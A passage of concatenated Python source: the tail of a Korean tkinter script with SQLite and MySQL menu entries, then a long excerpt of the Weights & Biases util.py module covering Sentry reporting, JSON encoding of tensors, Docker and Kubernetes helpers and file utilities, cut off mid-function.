otherMenu.add_command(label='SQLite에서 가져오기', command=openSQLite)
otherMenu.add_separator()
otherMenu.add_command(label='MySQL로 내보내기', command=saveMySQL)
otherMenu.add_command(label='MySQL에서 가져오기', command=openMySQL)
window.mainloop()
|
util.py | from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
import base64
import binascii
import colorsys
import contextlib
import codecs
import errno
import functools
import gzip
import hashlib
import json
import logging
import math
import numbers
import traceback
import os
import re
import shlex
import socket
import sys
import threading
import time
import random
import shortuuid
import importlib
import tarfile
import tempfile
import types
from typing import Optional
import yaml
from datetime import date, datetime
import platform
from six.moves import urllib
from typing import Any, Dict
import requests
import six
from six.moves import queue, input
from sys import getsizeof
from six.moves.collections_abc import Mapping, Sequence
from importlib import import_module
import sentry_sdk
from sentry_sdk import capture_exception
from sentry_sdk import capture_message
from wandb.env import error_reporting_enabled, get_app_url
import wandb
from wandb import env
from wandb.errors import CommError, term
logger = logging.getLogger(__name__)
_not_importable = set()
MAX_LINE_BYTES = (10 << 20) - (100 << 10) # imposed by back end
IS_GIT = os.path.exists(os.path.join(os.path.dirname(__file__), "..", ".git"))
RE_WINFNAMES = re.compile('[<>:"/\?*]')
# these match the environments for gorilla
if IS_GIT:
SENTRY_ENV = "development"
else:
SENTRY_ENV = "production"
if error_reporting_enabled():
sentry_sdk.init(
dsn="https://a2f1d701163c42b097b9588e56b1c37e@o151352.ingest.sentry.io/5288891",
release=wandb.__version__,
default_integrations=False,
environment=SENTRY_ENV,
)
POW_10_BYTES = [
("B", 10 ** 0),
("KB", 10 ** 3),
("MB", 10 ** 6),
("GB", 10 ** 9),
("TB", 10 ** 12),
("PB", 10 ** 15),
("EB", 10 ** 18),
]
POW_2_BYTES = [
("B", 2 ** 0),
("KiB", 2 ** 10),
("MiB", 2 ** 20),
("GiB", 2 ** 30),
("TiB", 2 ** 40),
("PiB", 2 ** 50),
("EiB", 2 ** 60),
]
def sentry_message(message):
if error_reporting_enabled():
capture_message(message)
def sentry_exc(exc, delay=False):
if error_reporting_enabled():
if isinstance(exc, six.string_types):
capture_exception(Exception(exc))
else:
capture_exception(exc)
if delay:
time.sleep(2)
def sentry_reraise(exc):
"""Re-raise an exception after logging it to Sentry
Use this for top-level exceptions when you want the user to see the traceback.
Must be called from within an exception handler.
"""
sentry_exc(exc)
# this will messily add this "reraise" function to the stack trace
# but hopefully it's not too bad
six.reraise(type(exc), exc, sys.exc_info()[2])
def sentry_set_scope(process_context, entity, project, email=None, url=None):
# Using GLOBAL_HUB means these tags will persist between threads.
# Normally there is one hub per thread.
with sentry_sdk.hub.GLOBAL_HUB.configure_scope() as scope:
scope.set_tag("process_context", process_context)
scope.set_tag("entity", entity)
scope.set_tag("project", project)
if email:
scope.user = {"email": email}
if url:
scope.set_tag("url", url)
def vendor_setup():
"""This enables us to use the vendor directory for packages we don't depend on
Returns a function to call after imports are complete. Make sure to call this
function or you will modify the user's path which is never good. The pattern should be:
reset_path = vendor_setup()
# do any vendor imports...
reset_path()
"""
original_path = [directory for directory in sys.path]
def reset_import_path():
sys.path = original_path
parent_dir = os.path.abspath(os.path.dirname(__file__))
vendor_dir = os.path.join(parent_dir, "vendor")
vendor_packages = ("gql-0.2.0", "graphql-core-1.1")
package_dirs = [os.path.join(vendor_dir, p) for p in vendor_packages]
for p in [vendor_dir] + package_dirs:
if p not in sys.path:
sys.path.insert(1, p)
return reset_import_path
def apple_gpu_stats_binary():
parent_dir = os.path.abspath(os.path.dirname(__file__))
return os.path.join(parent_dir, "bin", "apple_gpu_stats")
def vendor_import(name):
reset_path = vendor_setup()
module = import_module(name)
reset_path()
return module
def get_module(name, required=None):
"""
Return module or None. Absolute import is required.
:param (str) name: Dot-separated module path. E.g., 'scipy.stats'.
:param (str) required: A string to raise a ValueError if missing
:return: (module|None) If import succeeds, the module will be returned.
"""
if name not in _not_importable:
try:
return import_module(name)
except Exception as e:
_not_importable.add(name)
msg = "Error importing optional module {}".format(name)
if required:
logger.exception(msg)
if required and name in _not_importable:
raise wandb.Error(required)
def get_optional_module(name) -> Optional["importlib.ModuleInterface"]:
return get_module(name)
class LazyLoader(types.ModuleType):
"""Lazily import a module, mainly to avoid pulling in large dependencies.
we use this for tensorflow and other optional libraries primarily at the top module level
"""
# The lint error here is incorrect.
def __init__(
self, local_name, parent_module_globals, name, warning=None
): # pylint: disable=super-on-old-class
self._local_name = local_name
self._parent_module_globals = parent_module_globals
self._warning = warning
super(LazyLoader, self).__init__(name)
def _load(self):
"""Load the module and insert it into the parent's globals."""
# Import the target module and insert it into the parent's namespace
module = importlib.import_module(self.__name__)
self._parent_module_globals[self._local_name] = module
# Emit a warning if one was specified
if self._warning:
print(self._warning)
# Make sure to only warn once.
self._warning = None
# Update this object's dict so that if someone keeps a reference to the
# LazyLoader, lookups are efficient (__getattr__ is only called on lookups
# that fail).
self.__dict__.update(module.__dict__)
return module
def __getattr__(self, item):
module = self._load()
return getattr(module, item)
def __dir__(self):
module = self._load()
return dir(module)
class PreInitObject(object):
def __init__(self, name):
self._name = name
def __getitem__(self, key):
raise wandb.Error(
'You must call wandb.init() before {}["{}"]'.format(self._name, key)
)
def __setitem__(self, key, value):
raise wandb.Error(
'You must call wandb.init() before {}["{}"]'.format(self._name, key)
)
def __setattr__(self, key, value):
if not key.startswith("_"):
raise wandb.Error(
"You must call wandb.init() before {}.{}".format(self._name, key)
)
else:
return object.__setattr__(self, key, value)
def __getattr__(self, key):
if not key.startswith("_"):
raise wandb.Error(
"You must call wandb.init() before {}.{}".format(self._name, key)
)
else:
raise AttributeError()
np = get_module("numpy")
# TODO: Revisit these limits
VALUE_BYTES_LIMIT = 100000
def app_url(api_url):
"""Returns the frontend app url without a trailing slash."""
# TODO: move me to settings
app_url = get_app_url()
if app_url is not None:
return app_url.strip("/")
if "://api.wandb.test" in api_url:
# dev mode
return api_url.replace("://api.", "://app.").strip("/")
elif "://api.wandb." in api_url:
# cloud
return api_url.replace("://api.", "://").strip("/")
elif "://api." in api_url:
# onprem cloud
return api_url.replace("://api.", "://app.").strip("/")
# wandb/local
return api_url
def get_full_typename(o):
"""We determine types based on type names so we don't have to import
(and therefore depend on) PyTorch, TensorFlow, etc.
"""
instance_name = o.__class__.__module__ + "." + o.__class__.__name__
if instance_name in ["builtins.module", "__builtin__.module"]:
return o.__name__
else:
return instance_name
def get_h5_typename(o):
typename = get_full_typename(o)
if is_tf_tensor_typename(typename):
return "tensorflow.Tensor"
elif is_pytorch_tensor_typename(typename):
return "torch.Tensor"
else:
return o.__class__.__module__.split(".")[0] + "." + o.__class__.__name__
def is_uri(string):
parsed_uri = urllib.parse.urlparse(string)
return len(parsed_uri.scheme) > 0
def local_file_uri_to_path(uri):
"""
Convert URI to local filesystem path.
No-op if the uri does not have the expected scheme.
"""
path = urllib.parse.urlparse(uri).path if uri.startswith("file:") else uri
return urllib.request.url2pathname(path)
def get_local_path_or_none(path_or_uri):
"""Check if the argument is a local path (no scheme or file:///) and return local path if true,
None otherwise.
"""
parsed_uri = urllib.parse.urlparse(path_or_uri)
if (
len(parsed_uri.scheme) == 0
or parsed_uri.scheme == "file"
and len(parsed_uri.netloc) == 0
):
return local_file_uri_to_path(path_or_uri)
else:
return None
def make_tarfile(output_filename, source_dir, archive_name, custom_filter=None):
# Helper for filtering out modification timestamps
def _filter_timestamps(tar_info):
tar_info.mtime = 0
return tar_info if custom_filter is None else custom_filter(tar_info)
unzipped_filename = tempfile.mktemp()
try:
with tarfile.open(unzipped_filename, "w") as tar:
tar.add(source_dir, arcname=archive_name, filter=_filter_timestamps)
# When gzipping the tar, don't include the tar's filename or modification time in the
# zipped archive (see https://docs.python.org/3/library/gzip.html#gzip.GzipFile)
with gzip.GzipFile(
filename="", fileobj=open(output_filename, "wb"), mode="wb", mtime=0
) as gzipped_tar, open(unzipped_filename, "rb") as tar:
gzipped_tar.write(tar.read())
finally:
os.remove(unzipped_filename)
def _user_args_to_dict(arguments):
user_dict = {}
i = 0
while i < len(arguments):
arg = arguments[i]
split = arg.split("=", maxsplit=1)
# flag arguments don't require a value -> set to True if specified
if len(split) == 1 and (
i + 1 >= len(arguments) or arguments[i + 1].startswith("-")
):
name = split[0].lstrip("-")
value = True
i += 1
elif len(split) == 1 and not arguments[i + 1].startswith("-"):
name = split[0].lstrip("-")
value = arguments[i + 1]
i += 2
elif len(split) == 2:
name = split[0].lstrip("-")
value = split[1]
i += 1
if name in user_dict:
wandb.termerror("Repeated parameter: '%s'" % name)
sys.exit(1)
user_dict[name] = value
return user_dict
def is_tf_tensor(obj):
import tensorflow
return isinstance(obj, tensorflow.Tensor)
def is_tf_tensor_typename(typename):
return typename.startswith("tensorflow.") and (
"Tensor" in typename or "Variable" in typename
)
def is_tf_eager_tensor_typename(typename):
return typename.startswith("tensorflow.") and ("EagerTensor" in typename)
def is_pytorch_tensor(obj):
import torch
return isinstance(obj, torch.Tensor)
def is_pytorch_tensor_typename(typename):
return typename.startswith("torch.") and (
"Tensor" in typename or "Variable" in typename
)
def is_jax_tensor_typename(typename):
return typename.startswith("jaxlib.") and "DeviceArray" in typename
def get_jax_tensor(obj):
import jax
return jax.device_get(obj)
def is_fastai_tensor_typename(typename):
return typename.startswith("fastai.") and ("Tensor" in typename)
def is_pandas_data_frame_typename(typename):
return typename.startswith("pandas.") and "DataFrame" in typename
def is_matplotlib_typename(typename):
return typename.startswith("matplotlib.")
def is_plotly_typename(typename):
return typename.startswith("plotly.")
def is_plotly_figure_typename(typename):
return typename.startswith("plotly.") and typename.endswith(".Figure")
def is_numpy_array(obj):
return np and isinstance(obj, np.ndarray)
def is_pandas_data_frame(obj):
return is_pandas_data_frame_typename(get_full_typename(obj))
def ensure_matplotlib_figure(obj):
"""Extract the current figure from a matplotlib object or return the object if it's a figure.
raises ValueError if the object can't be converted.
"""
import matplotlib
from matplotlib.figure import Figure
# plotly and matplotlib broke in recent releases,
# this patches matplotlib to add a removed method that plotly assumes exists
from matplotlib.spines import Spine
def is_frame_like(self):
"""Return True if directly on axes frame.
This is useful for determining if a spine is the edge of an
old style MPL plot. If so, this function will return True.
"""
position = self._position or ("outward", 0.0)
if isinstance(position, str):
if position == "center":
position = ("axes", 0.5)
elif position == "zero":
position = ("data", 0)
if len(position) != 2:
raise ValueError("position should be 2-tuple")
position_type, amount = position
if position_type == "outward" and amount == 0:
return True
else:
return False
Spine.is_frame_like = is_frame_like
if obj == matplotlib.pyplot:
obj = obj.gcf()
elif not isinstance(obj, Figure):
if hasattr(obj, "figure"):
obj = obj.figure
# Some matplotlib objects have a figure function
if not isinstance(obj, Figure):
raise ValueError(
"Only matplotlib.pyplot or matplotlib.pyplot.Figure objects are accepted."
)
return obj
def matplotlib_to_plotly(obj):
obj = ensure_matplotlib_figure(obj)
tools = get_module(
"plotly.tools",
required="plotly is required to log interactive plots, install with: pip install plotly or convert the plot to an image with `wandb.Image(plt)`",
)
return tools.mpl_to_plotly(obj)
def matplotlib_contains_images(obj):
obj = ensure_matplotlib_figure(obj)
return any(len(ax.images) > 0 for ax in obj.axes)
def json_friendly(obj):
"""Convert an object into something that's more becoming of JSON"""
converted = True
typename = get_full_typename(obj)
if is_tf_eager_tensor_typename(typename):
obj = obj.numpy()
elif is_tf_tensor_typename(typename):
try:
obj = obj.eval()
except RuntimeError:
obj = obj.numpy()
elif is_pytorch_tensor_typename(typename) or is_fastai_tensor_typename(typename):
try:
if obj.requires_grad:
obj = obj.detach()
except AttributeError:
pass # before 0.4 is only present on variables
try:
obj = obj.data
except RuntimeError:
pass # happens for Tensors before 0.4
if obj.size():
obj = obj.cpu().detach().numpy()
else:
return obj.item(), True
elif is_jax_tensor_typename(typename):
obj = get_jax_tensor(obj)
if is_numpy_array(obj):
if obj.size == 1:
obj = obj.flatten()[0]
elif obj.size <= 32:
obj = obj.tolist()
elif np and isinstance(obj, np.generic):
obj = obj.item()
if isinstance(obj, float) and math.isnan(obj):
obj = None
elif isinstance(obj, np.generic) and obj.dtype.kind == "f":
# obj is a numpy float with precision greater than that of native python float
# (i.e., float96 or float128). in this case obj.item() does not return a native
# python float to avoid loss of precision, so we need to explicitly cast this
# down to a 64bit float
obj = float(obj)
elif isinstance(obj, bytes):
obj = obj.decode("utf-8")
elif isinstance(obj, (datetime, date)):
obj = obj.isoformat()
elif callable(obj):
obj = (
"{}.{}".format(obj.__module__, obj.__qualname__)
if hasattr(obj, "__qualname__") and hasattr(obj, "__module__")
else str(obj)
)
elif isinstance(obj, float) and math.isnan(obj):
obj = None
else:
converted = False
if getsizeof(obj) > VALUE_BYTES_LIMIT:
wandb.termwarn(
"Serializing object of type {} that is {} bytes".format(
type(obj).__name__, getsizeof(obj)
)
)
return obj, converted
def json_friendly_val(val):
"""Make any value (including dict, slice, sequence, etc) JSON friendly"""
if isinstance(val, dict):
converted = {}
for key, value in six.iteritems(val):
converted[key] = json_friendly_val(value)
return converted
if isinstance(val, slice):
converted = dict(
slice_start=val.start, slice_step=val.step, slice_stop=val.stop
)
return converted
val, _ = json_friendly(val)
if isinstance(val, Sequence) and not isinstance(val, six.string_types):
converted = []
for value in val:
converted.append(json_friendly_val(value))
return converted
else:
if val.__class__.__module__ not in ("builtins", "__builtin__"):
val = str(val)
return val
def convert_plots(obj):
if is_matplotlib_typename(get_full_typename(obj)):
tools = get_module(
"plotly.tools",
required="plotly is required to log interactive plots, install with: pip install plotly or convert the plot to an image with `wandb.Image(plt)`",
)
obj = tools.mpl_to_plotly(obj)
if is_plotly_typename(get_full_typename(obj)):
return {"_type": "plotly", "plot": obj.to_plotly_json()}
else:
return obj
def maybe_compress_history(obj):
if np and isinstance(obj, np.ndarray) and obj.size > 32:
return wandb.Histogram(obj, num_bins=32).to_json(), True
else:
return obj, False
def maybe_compress_summary(obj, h5_typename):
if np and isinstance(obj, np.ndarray) and obj.size > 32:
return (
{
"_type": h5_typename, # may not be ndarray
"var": np.var(obj).item(),
"mean": np.mean(obj).item(),
"min": np.amin(obj).item(),
"max": np.amax(obj).item(),
"10%": np.percentile(obj, 10),
"25%": np.percentile(obj, 25),
"75%": np.percentile(obj, 75),
"90%": np.percentile(obj, 90),
"size": obj.size,
},
True,
)
else:
return obj, False
def launch_browser(attempt_launch_browser=True):
"""Decide if we should launch a browser"""
_DISPLAY_VARIABLES = ["DISPLAY", "WAYLAND_DISPLAY", "MIR_SOCKET"]
_WEBBROWSER_NAMES_BLACKLIST = ["www-browser", "lynx", "links", "elinks", "w3m"]
import webbrowser
launch_browser = attempt_launch_browser
if launch_browser:
if "linux" in sys.platform and not any(
os.getenv(var) for var in _DISPLAY_VARIABLES
):
launch_browser = False
try:
browser = webbrowser.get()
if hasattr(browser, "name") and browser.name in _WEBBROWSER_NAMES_BLACKLIST:
launch_browser = False
except webbrowser.Error:
launch_browser = False
return launch_browser
def generate_id(length=8):
# ~3t run ids (36**8)
run_gen = shortuuid.ShortUUID(alphabet=list("0123456789abcdefghijklmnopqrstuvwxyz"))
return run_gen.random(length)
def parse_tfjob_config():
"""Attempts to parse TFJob config, returning False if it can't find it"""
if os.getenv("TF_CONFIG"):
try:
return json.loads(os.environ["TF_CONFIG"])
except ValueError:
return False
else:
return False
class WandBJSONEncoder(json.JSONEncoder):
"""A JSON Encoder that handles some extra types."""
def default(self, obj):
if hasattr(obj, "json_encode"):
return obj.json_encode()
# if hasattr(obj, 'to_json'):
# return obj.to_json()
tmp_obj, converted = json_friendly(obj)
if converted:
return tmp_obj
return json.JSONEncoder.default(self, obj)
class WandBJSONEncoderOld(json.JSONEncoder):
"""A JSON Encoder that handles some extra types."""
def default(self, obj):
tmp_obj, converted = json_friendly(obj)
tmp_obj, compressed = maybe_compress_summary(tmp_obj, get_h5_typename(obj))
if converted:
return tmp_obj
return json.JSONEncoder.default(self, tmp_obj)
class WandBHistoryJSONEncoder(json.JSONEncoder):
"""A JSON Encoder that handles some extra types.
This encoder turns numpy like objects with a size > 32 into histograms"""
def default(self, obj):
obj, converted = json_friendly(obj)
obj, compressed = maybe_compress_history(obj)
if converted:
return obj
return json.JSONEncoder.default(self, obj)
class JSONEncoderUncompressed(json.JSONEncoder):
"""A JSON Encoder that handles some extra types.
This encoder turns numpy like objects with a size > 32 into histograms"""
def default(self, obj):
if is_numpy_array(obj):
return obj.tolist()
elif np and isinstance(obj, np.generic):
obj = obj.item()
return json.JSONEncoder.default(self, obj)
def json_dump_safer(obj, fp, **kwargs):
"""Convert obj to json, with some extra encodable types."""
return json.dump(obj, fp, cls=WandBJSONEncoder, **kwargs)
def json_dumps_safer(obj, **kwargs):
"""Convert obj to json, with some extra encodable types."""
return json.dumps(obj, cls=WandBJSONEncoder, **kwargs)
# This is used for dumping raw json into files
def json_dump_uncompressed(obj, fp, **kwargs):
"""Convert obj to json, with some extra encodable types."""
return json.dump(obj, fp, cls=JSONEncoderUncompressed, **kwargs)
def json_dumps_safer_history(obj, **kwargs):
"""Convert obj to json, with some extra encodable types, including histograms"""
return json.dumps(obj, cls=WandBHistoryJSONEncoder, **kwargs)
def make_json_if_not_number(v):
"""If v is not a basic type convert it to json."""
if isinstance(v, (float, int)):
return v
return json_dumps_safer(v)
def make_safe_for_json(obj):
"""Replace invalid json floats with strings. Also converts to lists and dicts."""
if isinstance(obj, Mapping):
return {k: make_safe_for_json(v) for k, v in obj.items()}
elif isinstance(obj, str):
# str's are Sequence, so we need to short-circuit
return obj
elif isinstance(obj, Sequence):
return [make_safe_for_json(v) for v in obj]
elif isinstance(obj, float):
# W&B backend and UI handle these strings
if obj != obj: # standard way to check for NaN
return "NaN"
elif obj == float("+inf"):
return "Infinity"
elif obj == float("-inf"):
return "-Infinity"
return obj
def mkdir_exists_ok(path):
try:
os.makedirs(path)
return True
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(path):
return False
else:
raise
def no_retry_auth(e):
if hasattr(e, "exception"):
e = e.exception
if not isinstance(e, requests.HTTPError):
return True
if e.response is None:
return True
# Don't retry bad request errors; raise immediately
if e.response.status_code in (400, 409):
return False
# Retry all non-forbidden/unauthorized/not-found errors.
if e.response.status_code not in (401, 403, 404):
return True
# Crash w/message on forbidden/unauthorized errors.
if e.response.status_code == 401:
raise CommError("Invalid or missing api_key. Run wandb login")
elif wandb.run:
raise CommError("Permission denied to access {}".format(wandb.run.path))
else:
raise CommError("Permission denied, ask the project owner to grant you access")
def find_runner(program):
"""Return a command that will run program.
Arguments:
program: The string name of the program to try to run.
Returns:
commandline list of strings to run the program (eg. with subprocess.call()) or None
"""
if os.path.isfile(program) and not os.access(program, os.X_OK):
# program is a path to a non-executable file
try:
opened = open(program)
except IOError: # PermissionError doesn't exist in 2.7
return None
first_line = opened.readline().strip()
if first_line.startswith("#!"):
return shlex.split(first_line[2:])
if program.endswith(".py"):
return [sys.executable]
return None
def downsample(values, target_length):
"""Downsamples 1d values to target_length, including start and end.
Algorithm just rounds index down.
Values can be any sequence, including a generator.
"""
assert target_length > 1
values = list(values)
if len(values) < target_length:
return values
ratio = float(len(values) - 1) / (target_length - 1)
result = []
for i in range(target_length):
result.append(values[int(i * ratio)])
return result
def has_num(dictionary, key):
return key in dictionary and isinstance(dictionary[key], numbers.Number)
def md5_file(path):
hash_md5 = hashlib.md5()
with open(path, "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
hash_md5.update(chunk)
return base64.b64encode(hash_md5.digest()).decode("ascii")
def get_log_file_path():
"""Log file path used in error messages.
It would probably be better if this pointed to a log file in a
run directory.
"""
# TODO(jhr, cvp): refactor
if wandb.run:
return wandb.run._settings.log_internal
return os.path.join("wandb", "debug-internal.log")
def docker_image_regex(image):
"regex for valid docker image names"
if image:
return re.match(
r"^(?:(?=[^:\/]{1,253})(?!-)[a-zA-Z0-9-]{1,63}(?<!-)(?:\.(?!-)[a-zA-Z0-9-]{1,63}(?<!-))*(?::[0-9]{1,5})?/)?((?![._-])(?:[a-z0-9._-]*)(?<![._-])(?:/(?![._-])[a-z0-9._-]*(?<![._-]))*)(?::(?![.-])[a-zA-Z0-9_.-]{1,128})?$",
image,
)
def image_from_docker_args(args):
"""This scans docker run args and attempts to find the most likely docker image argument.
If excludes any argments that start with a dash, and the argument after it if it isn't a boolean
switch. This can be improved, we currently fallback gracefully when this fails.
"""
bool_args = [
"-t",
"--tty",
"--rm",
"--privileged",
"--oom-kill-disable",
"--no-healthcheck",
"-i",
"--interactive",
"--init",
"--help",
"--detach",
"-d",
"--sig-proxy",
"-it",
"-itd",
]
last_flag = -2
last_arg = ""
possible_images = []
if len(args) > 0 and args[0] == "run":
args.pop(0)
for i, arg in enumerate(args):
if arg.startswith("-"):
last_flag = i
last_arg = arg
elif "@sha256:" in arg:
# Because our regex doesn't match digests
possible_images.append(arg)
elif docker_image_regex(arg):
if last_flag == i - 2:
possible_images.append(arg)
elif "=" in last_arg:
possible_images.append(arg)
elif last_arg in bool_args and last_flag == i - 1:
possible_images.append(arg)
most_likely = None
for img in possible_images:
if ":" in img or "@" in img or "/" in img:
most_likely = img
break
if most_likely == None and len(possible_images) > 0:
most_likely = possible_images[0]
return most_likely
def load_yaml(file):
"""If pyyaml > 5.1 use full_load to avoid warning"""
if hasattr(yaml, "full_load"):
return yaml.full_load(file)
else:
return yaml.load(file)
def image_id_from_k8s():
"""Pings the k8s metadata service for the image id. Specify the
KUBERNETES_NAMESPACE environment variable if your pods are not in
the default namespace:
- name: KUBERNETES_NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
"""
token_path = "/var/run/secrets/kubernetes.io/serviceaccount/token"
if os.path.exists(token_path):
k8s_server = "https://{}:{}/api/v1/namespaces/{}/pods/{}".format(
os.getenv("KUBERNETES_SERVICE_HOST"),
os.getenv("KUBERNETES_PORT_443_TCP_PORT"),
os.getenv("KUBERNETES_NAMESPACE", "default"),
os.getenv("HOSTNAME"),
)
try:
res = requests.get(
k8s_server,
verify="/var/run/secrets/kubernetes.io/serviceaccount/ca.crt",
timeout=3,
headers={"Authorization": "Bearer {}".format(open(token_path).read())},
)
res.raise_for_status()
except requests.RequestException:
return None
try:
return res.json()["status"]["containerStatuses"][0]["imageID"].strip(
"docker-pullable://"
)
except (ValueError, KeyError, IndexError):
logger.exception("Error checking kubernetes for image id")
return None
def async_call(target, timeout=None):
"""Accepts a method and optional timeout.
Returns a new method that will call the original with any args, waiting for upto timeout seconds.
This new method blocks on the original and returns the result or None
if timeout was reached, along with the thread.
You can check thread.is_alive() to determine if a timeout was reached.
If an exception is thrown in the thread, we reraise it.
"""
q = queue.Queue()
def wrapped_target(q, *args, **kwargs):
try:
q.put(target(*args, **kwargs))
except Exception as e:
q.put(e)
def wrapper(*args, **kwargs):
thread = threading.Thread(
target=wrapped_target, args=(q,) + args, kwargs=kwargs
)
thread.daemon = True
thread.start()
try:
result = q.get(True, timeout)
if isinstance(result, Exception):
six.reraise(type(result), result, sys.exc_info()[2])
return result, thread
except queue.Empty:
return None, thread
return wrapper
def read_many_from_queue(q, max_items, queue_timeout):
try:
item = q.get(True, queue_timeout)
except queue.Empty:
return []
items = [item]
for i in range(max_items):
try:
item = q.get_nowait()
except queue.Empty:
return items
items.append(item)
return items
def stopwatch_now():
"""Get a timevalue for interval comparisons
When possible it is a monotonic clock to prevent backwards time issues.
"""
if six.PY2:
now = time.time()
else:
now = time.monotonic()
return now
def class_colors(class_count):
# make class 0 black, and the rest equally spaced fully saturated hues
return [[0, 0, 0]] + [
colorsys.hsv_to_rgb(i / (class_count - 1.0), 1.0, 1.0)
for i in range(class_count - 1)
]
def _prompt_choice(input_timeout: int = None, jupyter: bool = False,) -> str:
input_fn = input
prompt = term.LOG_STRING
if input_timeout:
# delayed import to mitigate risk of timed_input complexity
from wandb.sdk.lib import timed_input
input_fn = functools.partial(timed_input.timed_input, timeout=input_timeout)
# timed_input doesnt handle enhanced prompts
if platform.system() == "Windows":
prompt = "wandb"
text = f"{prompt}: Enter your choice: "
if input_fn == input:
choice = input_fn(text)
else:
choice = input_fn(text, jupyter=jupyter)
return choice
def prompt_choices(
choices, allow_manual=False, input_timeout: int = None, jupyter: bool = False,
):
"""Allow a user to choose from a list of options"""
for i, choice in enumerate(choices):
wandb.termlog("(%i) %s" % (i + 1, choice))
idx = -1
while idx < 0 or idx > len(choices) - 1:
choice = _prompt_choice(input_timeout=input_timeout, jupyter=jupyter)
if not choice:
continue
idx = -1
try:
idx = int(choice) - 1
except ValueError:
pass
if idx < 0 or idx > len(choices) - 1:
wandb.termwarn("Invalid choice")
result = choices[idx]
wandb.termlog("You chose '%s'" % result)
return result
def guess_data_type(shape, risky=False):
"""Infer the type of data based on the shape of the tensors
Arguments:
risky(bool): some guesses are more likely to be wrong.
"""
# (samples,) or (samples,logits)
if len(shape) in (1, 2):
return "label"
# Assume image mask like fashion mnist: (no color channel)
# This is risky because RNNs often have 3 dim tensors: batch, time, channels
if risky and len(shape) == 3:
return "image"
if len(shape) == 4:
if shape[-1] in (1, 3, 4):
# (samples, height, width, Y \ RGB \ RGBA)
return "image"
else:
# (samples, height, width, logits)
return "segmentation_mask"
return None
def download_file_from_url(dest_path, source_url, api_key=None):
response = requests.get(source_url, auth=("api", api_key), stream=True, timeout=5)
response.raise_for_status()
if os.sep in dest_path:
mkdir_exists_ok(os.path.dirname(dest_path))
with fsync_open(dest_path, "wb") as file:
for data in response.iter_content(chunk_size=1024):
file.write(data)
def isatty(ob):
return hasattr(ob, "isatty") and ob.isatty()
def to_human_size(bytes, units=None):
units = units or POW_10_BYTES
unit, value = units[0]
factor = round(float(bytes) / value, 1)
return (
"{}{}".format(factor, unit)
if factor < 1024 or len(units) == 1
else to_human_size(bytes, units[1:])
)
def from_human_size(size, units=None):
units = {unit.upper(): value for (unit, value) in units or POW_10_BYTES}
regex = re.compile(
r"(\d+\.?\d*)\s*({})?".format("|".join(units.keys())), re.IGNORECASE
)
match = re.match(regex, size)
if not match:
raise ValueError("Size must be of the form `10`, `10B` or `10 B`.")
factor, unit = (
float(match.group(1)),
units[match.group(2).upper()] if match.group(2) else 1,
)
return int(factor * unit)
def auto_project_name(program):
# if we're in git, set project name to git repo name + relative path within repo
root_dir = wandb.wandb_sdk.lib.git.GitRepo().root_dir
if root_dir is None:
return "uncategorized"
# On windows, GitRepo returns paths in unix style, but os.path is windows
# style. Coerce here.
root_dir = to_native_slash_path(root_dir)
repo_name = os.path.basename(root_dir)
if program is None:
return repo_name
if not os.path.isabs(program):
program = os.path.join(os.curdir, program)
prog_dir = os.path.dirname(os.path.abspath(program))
if not prog_dir.startswith(root_dir):
return repo_name
project = repo_name
sub_path = os.path.relpath(prog_dir, root_dir)
if sub_path != ".":
project += "-" + sub_path
return project.replace(os.sep, "_")
def parse_sweep_id(parts_dict):
"""In place parse sweep path from parts dict.
Arguments:
parts_dict (dict): dict(entity=,project=,name=). Modifies dict inplace.
Returns:
None or str if there is an error
"""
entity = None
project = None
sweep_id = parts_dict.get("name")
if not isinstance(sweep_id, six.string_types):
return "Expected string sweep_id"
sweep_split = sweep_id.split("/")
if len(sweep_split) == 1:
pass
elif len(sweep_split) == 2:
split_project, sweep_id = sweep_split
project = split_project or project
elif len(sweep_split) == 3:
split_entity, split_project, sweep_id = sweep_split
project = split_project or project
entity = split_entity or entity
else:
return (
"Expected sweep_id in form of sweep, project/sweep, or entity/project/sweep"
)
parts_dict.update(dict(name=sweep_id, project=project, entity=entity))
def to_forward_slash_path(path: str) -> str:
if platform.system() == "Windows":
path = path.replace("\\", "/")
return path
def to_native_slash_path(path):
return path.replace("/", os.sep)
def bytes_to_hex(bytestr):
# Works in python2 / python3
return codecs.getencoder("hex")(bytestr)[0].decode("ascii")
def check_and_warn_old(files):
if "wandb-metadata.json" in files:
wandb.termwarn("These runs were logged with a previous version of wandb.")
wandb.termwarn(
"Run pip install wandb<0.10.0 to get the old library and sync your runs."
)
return True
return False
class ImportMetaHook:
def __init__(self):
self.modules = {}
self.on_import = {}
def add(self, fullname, on_import):
self.on_import.setdefault(fullname, []).append(on_import)
def install(self):
sys.meta_path.insert(0, self)
def uninstall(self):
sys.meta_path.remove(self)
def find_module(self, fullname, path=None):
if fullname in self.on_import:
return self
def load_module(self, fullname):
self.uninstall()
mod = importlib.import_module(fullname)
self.install()
self.modules[fullname] = mod
on_imports = self.on_import.get(fullname)
if on_imports:
for f in on_imports:
f()
return mod
def get_modules(self):
return tuple(self.modules)
def get_module(self, module):
return self.modules[module]
_import_hook = None
def add_import_hook(fullname, on_import):
global _import_hook
if _import_hook is None:
_import_hook = ImportMetaHook()
_import_hook.install()
_import_hook.add(fullname, on_import)
def b64_to_hex_id(id_string):
return binascii.hexlify(base64.standard_b64decode(str(id_string))).decode("utf-8")
def hex_to_b64_id(encoded_string):
return base64.standard_b64encode(binascii.unhexlify(encoded_string)).decode("utf-8")
def host_from_path(path):
"""returns the host of the path"""
url = urllib.parse.urlparse(path)
return url.netloc
def uri_from_path(path):
"""returns the URI of the path"""
url = urllib.parse.urlparse(path)
return url.path if url.path[0] != "/" else url.path[1:]
def is_unicode_safe(stream):
"""returns true if the stream supports UTF-8"""
if not hasattr(stream, "encoding"):
return False
return stream.encoding.lower() in {"utf-8", "utf_8"}
def _has_internet():
"""Attempts to open a DNS connection to Googles root servers"""
try:
s = socket.create_connection(("8.8.8.8", 53), 0.5)
s.close()
return True
except OSError:
return False
def rand_alphanumeric(length=8, rand=None):
rand = rand or random
return "".join(rand.choice("0123456789ABCDEF") for _ in range(length))
@contextlib.contextmanager
def fsync_open(path, mode="w"):
"""
Opens a path for I/O, guaranteeing that the file is flushed and
fsynced when the file's context expires.
"""
with open(path, mode) as f:
yield f
f.flush()
os.fsync(f.fileno())
def _is_kaggle():
return (
os.getenv("KAGGLE_KERNEL_RUN_TYPE") is not None
